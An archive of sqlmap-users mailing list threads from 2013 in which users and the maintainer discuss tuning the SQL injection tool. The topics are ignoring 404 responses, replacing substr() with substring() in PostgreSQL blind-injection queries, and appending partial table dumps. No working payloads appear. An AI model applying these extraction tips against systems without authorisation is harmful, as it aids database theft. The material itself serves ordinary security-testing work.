> response: 404
>
> ...
>
> sqlmap seams to tolerate occasional 404 response codes but when
> running with --level=5  sqlmap gives up due to the high amount of 404
> response codes.
>
> Even though this web application behaviour is probably not HTTP
> conform, is there a way to tell sqlmap "keep on going even if the
> server tells you 404 file not found"?
>
> If there is currently no such feature, what do you think about it?
>
> With --ignore-404 I do not mean to imply that sqlmap should not
> evaluate HTTP status codes at all (e.g. when using to differentiate
> between true and false in boolean based sql injections).
> -----BEGIN PGP SIGNATURE-----
>
> iQIcBAEBCgAGBQJReCcRAAoJEJeRHQyF0ukMSOEQALnMIGbE1RokANiasA6LnES2
> 5+tghChF/X3c2dleN4bOG7QQU14jI32tBjGRcncET7WOc16XBXExTOAMzp8GUKQU
> 6JUMwVwBssUAcJ5C3CM1/IzCh8A03k9G0jNYobEMxWhd0a7Y9b9n1lhjf/aE2nDf
> DZUPqErXEAWXSfJAeG6Rm9kr8sfnMvSS6Qqa8oCZ6f3d52eEztSuU79l9FMu8CRu
> yI8qk2kpQj3S7PbJ/ahy2aCMfycvPpgZyTlFRomPKB3VR5ZLiomCKu2r+Q5Nyism
> P4BS7t2nUawyk3MUadjFxxetxCuOLv6oDVE95hwYREJ0ynkys4Q7t85vLl+d8DDz
> y0Dtdj93KZqxwGKfrWcBsS4rcfBXqncLaFSFwmIAlJbk5Mf5qwYmnc5HxH7apyhn
> B9vwfcZlMllrIYhcZo/EmMzXo617TCAnfBljCmskEjZZCCmtIaLpEUfYY2K1Zvcd
> c/4gAQmTWGiW9jaPa0WQ35PrMyz9okRpylHfmApFMEpmCPj7aIaZuQFRM6MNtrul
> zylUcJK1zcGQh2gUYvdFrCdUhuHbN+NNJtLF1XKe5PsahyzBpWHluyony52V7CPK
> bbikP6q3VQi+ONNvPW+M6ZGquMiagaTwcKM4tY3OWgZWyf8gxhJFgBhLOeUJXRkX
> WOD+PRSe2JBDLE577t5g
> =wHFU
> -----END PGP SIGNATURE-----
>
>
> ------------------------------------------------------------------------------
> Try New Relic Now & We'll Send You this Cool Shirt
> New Relic is the only SaaS-based application performance monitoring service
> that delivers powerful full stack analytics. Optimize and monitor your
> browser, app, & servers with just a few lines of code. Try New Relic
> and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_apr
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1)

[Miroslav S. <mir...@gm...>]

p.s. typo: Replace -> Replaced
p.p.s. just update to have it up and running


On Thu, Apr 25, 2013 at 10:17 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi Buawig.
>
> It was probably a problem with comma processing (e.g. some kind of field
> splitting)
>
> Nevertheless, went through PgSQL manuals and spotted no difference in both
> functionality and compatibility.
>
> Replace with the latest commit [1]
>
> Kind regards,
> Miroslav Stampar
>
> [1]
> https://github.com/sqlmapproject/sqlmap/commit/ff62b0d3eaee311c786cd5b9ad5b1cbf1d28c3a3
>
>
>
> On Wed, Apr 24, 2013 at 9:24 PM, buawig <bu...@gm...> wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA512
>>
>> Hi,
>>
>> on a recent blind SQLi (PostgreSQL 8.4) I had problems using sqlmap to
>> extract data.
>>
>> After having a deeper look at it I noticed that the DB did like the
>> function substr() (I can not entirely exclude it but I do not think
>> that this problem was introduced by some kind of weird anti sqli
>> filtering).
>> To work around that issue I replaced the substr() function in
>>
>> xml/queries.xml
>>
>> with substring( .. from N for 1) and everything worked fine.
>>
>> I thought you might want to add that possibility as a second option
>> (query2= ?) to automatically detect/workaround that issue?
>> -----BEGIN PGP SIGNATURE-----
>>
>> iQIcBAEBCgAGBQJReDF6AAoJEJeRHQyF0ukMOjQQAKIATbP/WL2LkgOdjVAZ5kG+
>> Yafdgrp8Cn1oL2X9AdOZL/Xr2dh67GsbV6sgCc6uv35I8rqMtfs81FlqplvLD0h0
>> 7sb/1RXTTrrbmMEZGaGyiZhqEdlr5DDooXM3fEmgkEoXgQ1Ht9sjz3PzNk2bWCUB
>> EIip1Jrp2EbZPAkNgfcXNcpq3ojSULkvEua0WawxR1voAI1YiWpYBAUI+LHheUVG
>> 3PGPb5MHjGEBs1m3Hhw/hSHtlR7YhPzsx+Mk99pJkcluardzEsyucLax3MevLI1i
>> KCWxDP0QT3MmVdBk89/ETOxhWbka1NeCDEv7gVBzYG3DHptD4PfSbsInUdJGQtZ8
>> bd0GjJdi9Ie4Rl3KMNXPt3j2VLq1neuLsTm/r8xwDqdLfpSeZ5eTiy1W5/usAz+o
>> 4VDfHp7vZRMooL3PPi6Ie+l0mfY5KtFE2pcXF3EZ2DyUl9xB38v9tfgMZ8dXVa/Q
>> mpH5Zp5V82soa+Xdb+LLkzRTuhIJg0sScvINrPbDyzQOQiTaVZXjL++pa7sOeoYJ
>> Ag4+QIt+FvhIKog0zlc53qc7J/M3R2H3DH3G/2+FevxWTvR+m/NqsbWFujuYnu3j
>> pCyIc9+dScBnTgk1SjCsa7HdKBeuSOwVTJiE3FY6jLmfP2JwChKC/IgxxBM9AQOY
>> GcuFPtVicifZihtWaqwa
>> =VzEN
>> -----END PGP SIGNATURE-----
>>
>>
>> ------------------------------------------------------------------------------
>> Try New Relic Now & We'll Send You this Cool Shirt
>> New Relic is the only SaaS-based application performance monitoring
>> service
>> that delivers powerful full stack analytics. Optimize and monitor your
>> browser, app, & servers with just a few lines of code. Try New Relic
>> and get this awesome Nerd Life shirt!
>> http://p.sf.net/sfu/newrelic_d2d_apr
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1)

[Miroslav S. <mir...@gm...>]

Hi Buawig.

It was probably a problem with comma processing (e.g. some kind of field
splitting)

Nevertheless, went through PgSQL manuals and spotted no difference in both
functionality and compatibility.

Replace with the latest commit [1]

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/ff62b0d3eaee311c786cd5b9ad5b1cbf1d28c3a3



On Wed, Apr 24, 2013 at 9:24 PM, buawig <bu...@gm...> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> Hi,
>
> on a recent blind SQLi (PostgreSQL 8.4) I had problems using sqlmap to
> extract data.
>
> After having a deeper look at it I noticed that the DB did like the
> function substr() (I can not entirely exclude it but I do not think
> that this problem was introduced by some kind of weird anti sqli
> filtering).
> To work around that issue I replaced the substr() function in
>
> xml/queries.xml
>
> with substring( .. from N for 1) and everything worked fine.
>
> I thought you might want to add that possibility as a second option
> (query2= ?) to automatically detect/workaround that issue?
> -----BEGIN PGP SIGNATURE-----
>
> iQIcBAEBCgAGBQJReDF6AAoJEJeRHQyF0ukMOjQQAKIATbP/WL2LkgOdjVAZ5kG+
> Yafdgrp8Cn1oL2X9AdOZL/Xr2dh67GsbV6sgCc6uv35I8rqMtfs81FlqplvLD0h0
> 7sb/1RXTTrrbmMEZGaGyiZhqEdlr5DDooXM3fEmgkEoXgQ1Ht9sjz3PzNk2bWCUB
> EIip1Jrp2EbZPAkNgfcXNcpq3ojSULkvEua0WawxR1voAI1YiWpYBAUI+LHheUVG
> 3PGPb5MHjGEBs1m3Hhw/hSHtlR7YhPzsx+Mk99pJkcluardzEsyucLax3MevLI1i
> KCWxDP0QT3MmVdBk89/ETOxhWbka1NeCDEv7gVBzYG3DHptD4PfSbsInUdJGQtZ8
> bd0GjJdi9Ie4Rl3KMNXPt3j2VLq1neuLsTm/r8xwDqdLfpSeZ5eTiy1W5/usAz+o
> 4VDfHp7vZRMooL3PPi6Ie+l0mfY5KtFE2pcXF3EZ2DyUl9xB38v9tfgMZ8dXVa/Q
> mpH5Zp5V82soa+Xdb+LLkzRTuhIJg0sScvINrPbDyzQOQiTaVZXjL++pa7sOeoYJ
> Ag4+QIt+FvhIKog0zlc53qc7J/M3R2H3DH3G/2+FevxWTvR+m/NqsbWFujuYnu3j
> pCyIc9+dScBnTgk1SjCsa7HdKBeuSOwVTJiE3FY6jLmfP2JwChKC/IgxxBM9AQOY
> GcuFPtVicifZihtWaqwa
> =VzEN
> -----END PGP SIGNATURE-----
>
>
> ------------------------------------------------------------------------------
> Try New Relic Now & We'll Send You this Cool Shirt
> New Relic is the only SaaS-based application performance monitoring service
> that delivers powerful full stack analytics. Optimize and monitor your
> browser, app, & servers with just a few lines of code. Try New Relic
> and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_apr
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1)

[buawig <bu...@gm...>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi,

on a recent blind SQLi (PostgreSQL 8.4) I had problems using sqlmap to
extract data.

After having a deeper look at it I noticed that the DB did like the
function substr() (I can not entirely exclude it but I do not think
that this problem was introduced by some kind of weird anti sqli
filtering).
To work around that issue I replaced the substr() function in

xml/queries.xml

with substring( .. from N for 1) and everything worked fine.

I thought you might want to add that possibility as a second option
(query2= ?) to automatically detect/workaround that issue?
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJReDF6AAoJEJeRHQyF0ukMOjQQAKIATbP/WL2LkgOdjVAZ5kG+
Yafdgrp8Cn1oL2X9AdOZL/Xr2dh67GsbV6sgCc6uv35I8rqMtfs81FlqplvLD0h0
7sb/1RXTTrrbmMEZGaGyiZhqEdlr5DDooXM3fEmgkEoXgQ1Ht9sjz3PzNk2bWCUB
EIip1Jrp2EbZPAkNgfcXNcpq3ojSULkvEua0WawxR1voAI1YiWpYBAUI+LHheUVG
3PGPb5MHjGEBs1m3Hhw/hSHtlR7YhPzsx+Mk99pJkcluardzEsyucLax3MevLI1i
KCWxDP0QT3MmVdBk89/ETOxhWbka1NeCDEv7gVBzYG3DHptD4PfSbsInUdJGQtZ8
bd0GjJdi9Ie4Rl3KMNXPt3j2VLq1neuLsTm/r8xwDqdLfpSeZ5eTiy1W5/usAz+o
4VDfHp7vZRMooL3PPi6Ie+l0mfY5KtFE2pcXF3EZ2DyUl9xB38v9tfgMZ8dXVa/Q
mpH5Zp5V82soa+Xdb+LLkzRTuhIJg0sScvINrPbDyzQOQiTaVZXjL++pa7sOeoYJ
Ag4+QIt+FvhIKog0zlc53qc7J/M3R2H3DH3G/2+FevxWTvR+m/NqsbWFujuYnu3j
pCyIc9+dScBnTgk1SjCsa7HdKBeuSOwVTJiE3FY6jLmfP2JwChKC/IgxxBM9AQOY
GcuFPtVicifZihtWaqwa
=VzEN
-----END PGP SIGNATURE-----

[sqlmap-users] --ignore-404 ?

[buawig <bu...@gm...>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi,

a custom web application responds to different URL parameter payloads
with changing HTTP status codes:


example.com/foo.bar?param=payload1
response: 200

example.com/foo.bar?param=payload2
response: 403

example.com/foo.bar?param=payload3
response: 400

example.com/foo.bar?param=payload4
response: 404

...

sqlmap seams to tolerate occasional 404 response codes but when
running with --level=5  sqlmap gives up due to the high amount of 404
response codes.

Even though this web application behaviour is probably not HTTP
conform, is there a way to tell sqlmap "keep on going even if the
server tells you 404 file not found"?

If there is currently no such feature, what do you think about it?

With --ignore-404 I do not mean to imply that sqlmap should not
evaluate HTTP status codes at all (e.g. when using to differentiate
between true and false in boolean based sql injections).
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJReCcRAAoJEJeRHQyF0ukMSOEQALnMIGbE1RokANiasA6LnES2
5+tghChF/X3c2dleN4bOG7QQU14jI32tBjGRcncET7WOc16XBXExTOAMzp8GUKQU
6JUMwVwBssUAcJ5C3CM1/IzCh8A03k9G0jNYobEMxWhd0a7Y9b9n1lhjf/aE2nDf
DZUPqErXEAWXSfJAeG6Rm9kr8sfnMvSS6Qqa8oCZ6f3d52eEztSuU79l9FMu8CRu
yI8qk2kpQj3S7PbJ/ahy2aCMfycvPpgZyTlFRomPKB3VR5ZLiomCKu2r+Q5Nyism
P4BS7t2nUawyk3MUadjFxxetxCuOLv6oDVE95hwYREJ0ynkys4Q7t85vLl+d8DDz
y0Dtdj93KZqxwGKfrWcBsS4rcfBXqncLaFSFwmIAlJbk5Mf5qwYmnc5HxH7apyhn
B9vwfcZlMllrIYhcZo/EmMzXo617TCAnfBljCmskEjZZCCmtIaLpEUfYY2K1Zvcd
c/4gAQmTWGiW9jaPa0WQ35PrMyz9okRpylHfmApFMEpmCPj7aIaZuQFRM6MNtrul
zylUcJK1zcGQh2gUYvdFrCdUhuHbN+NNJtLF1XKe5PsahyzBpWHluyony52V7CPK
bbikP6q3VQi+ONNvPW+M6ZGquMiagaTwcKM4tY3OWgZWyf8gxhJFgBhLOeUJXRkX
WOD+PRSe2JBDLE577t5g
=wHFU
-----END PGP SIGNATURE-----

Re: [sqlmap-users] Appending to a dump

[Miroslav S. <mir...@gm...>]

Hi Stephen.

Thank you and find it implemented with the latest commit [1].

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/63d7707346321e198cc8e53b64f01244ee5b7f66


On Wed, Apr 24, 2013 at 1:22 PM, Stephen Shkardoon <ss...@ss...>wrote:

> Thanks!
>
> Always appreciate the work you do. Awesome that you can implement this so
> quickly.
>
>
> On Wed, Apr 24, 2013 at 11:17 PM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Hi Stephen.
>>
>> Going to patch it today.
>>
>> Kind regards,
>> Miroslav Stampar
>> Dana 24.4.2013. 13:10 "Stephen Shkardoon" <ss...@ss...> je
>> napisao/la:
>>
>>>  I have a particular injection that requires a lot of manual
>>> intervention, and as such, I'm doing dumps with --start=X --stop=X+50 (or
>>> so). However, this replaces the output/foo/table.csv, rather than appending
>>> each dump to it.
>>>
>>> An chance of a workaround (of course I can manually copy it
>>> as required , or a feature request being opened or anything like that?
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Try New Relic Now & We'll Send You this Cool Shirt
>>> New Relic is the only SaaS-based application performance monitoring
>>> service
>>> that delivers powerful full stack analytics. Optimize and monitor your
>>> browser, app, & servers with just a few lines of code. Try New Relic
>>> and get this awesome Nerd Life shirt!
>>> http://p.sf.net/sfu/newrelic_d2d_apr
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>


-- 
Miroslav Stampar
http://about.me/stamparm